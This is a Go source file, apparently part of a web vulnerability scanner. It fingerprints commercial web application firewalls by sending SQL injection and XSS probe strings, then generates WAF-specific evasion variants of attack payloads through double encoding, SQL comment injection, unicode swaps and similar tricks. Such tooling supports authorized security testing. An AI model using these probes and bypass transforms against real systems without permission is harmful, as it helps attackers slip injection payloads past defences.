// Package waf detects Web Application Firewalls and provides bypass strategies.
// The engine calls Detect() once per target host; modules call BypassPayloads()
// to get WAF-aware payload variants alongside their default list.
// Use WithContext / FromContext to thread the WAF result through scan context.
package waf

import (
	"context"
	"fmt"
	"net/http"
	"strings"
	"sync"

	"github.com/erebus/scanner/internal/client"
)

type contextKey struct{}

// WithContext stores the WAF detection result in ctx so all modules can retrieve it.
func WithContext(ctx context.Context, r *Result) context.Context {
	return context.WithValue(ctx, contextKey{}, r)
}

// FromContext retrieves the WAF result stored by WithContext.
// Returns nil if no result has been stored.
func FromContext(ctx context.Context) *Result {
	r, _ := ctx.Value(contextKey{}).(*Result)
	return r
}

// Kind identifies a detected WAF.
type Kind string

const (
	Unknown    Kind = ""
	Cloudflare Kind = "Cloudflare"
	ModSecurity Kind = "ModSecurity"
	AWSWaf     Kind = "AWS WAF"
	Akamai     Kind = "Akamai"
	Imperva    Kind = "Imperva/Incapsula"
	F5BigIP    Kind = "F5 BIG-IP ASM"
	Sucuri     Kind = "Sucuri"
	Barracuda  Kind = "Barracuda"
	Wordfence  Kind = "Wordfence"
	Generic    Kind = "Generic WAF"
)

// Result is the WAF detection result for one host.
type Result struct {
	Kind        Kind
	Confidence  string // "confirmed" | "likely"
	Evidence    []string
	BlockStatus int // HTTP status code returned when WAF blocks
}

var (
	cache   = make(map[string]*Result)
	cacheMu sync.RWMutex
)

// Detect probes the target with a known-bad SQLi payload and fingerprints the WAF.
// Results are cached per host — safe to call from multiple modules.
func Detect(ctx context.Context, c *client.Client, targetURL string) *Result {
	host := extractHost(targetURL)

	cacheMu.RLock()
	if r, ok := cache[host]; ok {
		cacheMu.RUnlock()
		return r
	}
	cacheMu.RUnlock()

	r := detect(ctx, c, targetURL)

	cacheMu.Lock()
	cache[host] = r
	cacheMu.Unlock()

	return r
}

func detect(ctx context.Context, c *client.Client, targetURL string) *Result {
	result := &Result{Kind: Unknown}

	// Probe 1: known SQLi probe that WAFs reliably block
	probeURL := targetURL + "?erebus_waf_probe=' OR '1'='1"
	req, err := http.NewRequestWithContext(ctx, http.MethodGet, probeURL, nil)
	if err != nil {
		return result
	}
	resp, err := c.Do(req)
	if err != nil {
		return result
	}
	body, _ := client.ReadBody(resp)

	result.BlockStatus = resp.StatusCode
	fingerprint(resp, string(body), result)

	// Probe 2: XSS probe
	if result.Kind == Unknown {
		req2, err := http.NewRequestWithContext(ctx, http.MethodGet,
			targetURL+"?xss=<script>alert(1)</script>", nil)
		if err == nil {
			resp2, err := c.Do(req2)
			if err == nil {
				body2, _ := client.ReadBody(resp2)
				fingerprint(resp2, string(body2), result)
			}
		}
	}

	return result
}

func fingerprint(resp *http.Response, body string, r *Result) {
	bodyLow := strings.ToLower(body)
	hdrs := resp.Header

	checks := []struct {
		kind      Kind
		condition func() bool
		evidence  string
	}{
		{Cloudflare, func() bool {
			return hdrs.Get("CF-Ray") != "" || strings.Contains(bodyLow, "cloudflare") ||
				hdrs.Get("Server") == "cloudflare" || strings.Contains(bodyLow, "cf-ray")
		}, "CF-Ray header or Cloudflare body fingerprint"},

		{AWSWaf, func() bool {
			return strings.Contains(hdrs.Get("X-Amzn-Requestid"), "-") ||
				strings.Contains(body, "AWS WAF") ||
				hdrs.Get("X-AMZ-CF-ID") != ""
		}, "AWS WAF header (X-Amzn-Requestid or X-AMZ-CF-ID)"},

		{Akamai, func() bool {
			return hdrs.Get("X-Check-Cacheable") != "" ||
				strings.Contains(bodyLow, "reference #") ||
				strings.Contains(bodyLow, "akamai")
		}, "Akamai header or body fingerprint"},

		{Imperva, func() bool {
			for _, ck := range resp.Cookies() {
				if strings.HasPrefix(ck.Name, "incap_ses") || strings.HasPrefix(ck.Name, "visid_incap") {
					return true
				}
			}
			return strings.Contains(bodyLow, "incapsula") || strings.Contains(bodyLow, "request unsuccessful")
		}, "Imperva/Incapsula cookie or body fingerprint"},

		{ModSecurity, func() bool {
			return strings.Contains(bodyLow, "mod_security") ||
				strings.Contains(bodyLow, "modsecurity") ||
				strings.Contains(bodyLow, "this error was generated by mod") ||
				strings.Contains(hdrs.Get("X-Powered-By"), "Mod_Security")
		}, "ModSecurity body or header fingerprint"},

		{F5BigIP, func() bool {
			for _, ck := range resp.Cookies() {
				if strings.HasPrefix(ck.Name, "TS0") || strings.HasPrefix(ck.Name, "BigIP") {
					return true
				}
			}
			return strings.Contains(bodyLow, "the requested url was rejected") ||
				strings.Contains(bodyLow, "f5 networks")
		}, "F5 BIG-IP ASM cookie or body fingerprint"},

		{Sucuri, func() bool {
			return hdrs.Get("X-Sucuri-ID") != "" ||
				strings.Contains(bodyLow, "sucuri") ||
				strings.Contains(bodyLow, "cloudproxy")
		}, "Sucuri header or body fingerprint"},

		{Barracuda, func() bool {
			for _, ck := range resp.Cookies() {
				if strings.HasPrefix(ck.Name, "barra_counter_session") {
					return true
				}
			}
			return strings.Contains(bodyLow, "barracuda")
		}, "Barracuda cookie or body fingerprint"},

		{Wordfence, func() bool {
			return strings.Contains(bodyLow, "wordfence") ||
				strings.Contains(bodyLow, "generated by wordfence")
		}, "Wordfence body fingerprint"},

		{Generic, func() bool {
			return (resp.StatusCode == 403 || resp.StatusCode == 406 || resp.StatusCode == 429) &&
				(strings.Contains(bodyLow, "access denied") ||
					strings.Contains(bodyLow, "forbidden") ||
					strings.Contains(bodyLow, "blocked") ||
					strings.Contains(bodyLow, "security") ||
					strings.Contains(bodyLow, "suspicious"))
		}, fmt.Sprintf("Generic WAF: HTTP %d with blocking message", resp.StatusCode)},
	}

	for _, check := range checks {
		if check.condition() {
			r.Kind = check.kind
			r.Evidence = append(r.Evidence, check.evidence)
			r.Confidence = "confirmed"
			return
		}
	}
}

// BypassPayloads returns WAF-bypass variants of a payload tailored to the
// detected WAF. If no WAF is detected (or kind is Unknown), returns nil.
func BypassPayloads(base string, wafKind Kind) []string {
	if wafKind == Unknown {
		return nil
	}

	var bypasses []string

	// Universal encoding bypasses (most WAFs)
	bypasses = append(bypasses,
		urlDoubleEncode(base),   // double URL encoding
		commentsInject(base),    // SQL comment injection
		caseVariant(base),       // case variation
		unicodeVariant(base),    // unicode characters
		whitespaceVariant(base), // alternate whitespace
	)

	// WAF-specific
	switch wafKind {
	case Cloudflare:
		bypasses = append(bypasses,
			hexEncode(base),
		)
	case ModSecurity:
		bypasses = append(bypasses,
			multilinePayload(base),
			paramPollution(base),
		)
	case AWSWaf:
		bypasses = append(bypasses,
			jsonWrapPayload(base),
		)
	}

	// Deduplicate and remove empty
	seen := make(map[string]struct{})
	var out []string
	for _, p := range bypasses {
		if p != "" && p != base {
			if _, ok := seen[p]; !ok {
				seen[p] = struct{}{}
				out = append(out, p)
			}
		}
	}
	return out
}

// IsBlocked returns true if the response looks like a WAF block for the given WAF kind.
func IsBlocked(resp *http.Response, wafKind Kind) bool {
	if wafKind == Unknown {
		return resp.StatusCode == 403 || resp.StatusCode == 406
	}
	return resp.StatusCode == 403 || resp.StatusCode == 406 || resp.StatusCode == 429
}

// ---- bypass transformers ----

func urlDoubleEncode(s string) string {
	return strings.NewReplacer(
		"'", "%2527",
		"<", "%253C",
		">", "%253E",
		" ", "%2520",
		"(", "%2528",
		")", "%2529",
	).Replace(s)
}

func commentsInject(s string) string {
	return strings.NewReplacer(
		" OR ", "/**/OR/**/",
		" AND ", "/**/AND/**/",
		" UNION ", "/**/UNION/**/",
		" SELECT ", "/**/SELECT/**/",
		" FROM ", "/**/FROM/**/",
		" WHERE ", "/**/WHERE/**/",
	).Replace(s)
}

func caseVariant(s string) string {
	var out strings.Builder
	for i, c := range s {
		if i%2 == 0 {
			out.WriteRune(c)
		} else {
			out.WriteString(strings.ToUpper(string(c)))
		}
	}
	return out.String()
}

func unicodeVariant(s string) string {
	return strings.NewReplacer(
		"<", "＜",
		">", "＞",
		"'", "ʼ",
		" ", " ",
	).Replace(s)
}

func whitespaceVariant(s string) string {
	return strings.NewReplacer(
		" OR ", "%09OR%09",
		" AND ", "%0aAND%0a",
		" UNION ", "%0dUNION%0d",
		" SELECT ", "%0cSELECT%0c",
	).Replace(s)
}

func hexEncode(s string) string {
	var out strings.Builder
	for _, c := range s {
		if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') {
			out.WriteString(fmt.Sprintf("\\x%02x", c))
		} else {
			out.WriteRune(c)
		}
	}
	return out.String()
}


func multilinePayload(s string) string {
	return strings.ReplaceAll(s, " ", "\r\n")
}

func paramPollution(s string) string {
	return s + "&" + s
}

func jsonWrapPayload(s string) string {
	return `{"q":"` + s + `"}`
}

func extractHost(rawURL string) string {
	idx := strings.Index(rawURL, "://")
	if idx < 0 {
		return rawURL
	}
	rest := rawURL[idx+3:]
	if slash := strings.Index(rest, "/"); slash >= 0 {
		return rest[:slash]
	}
	return rest
}
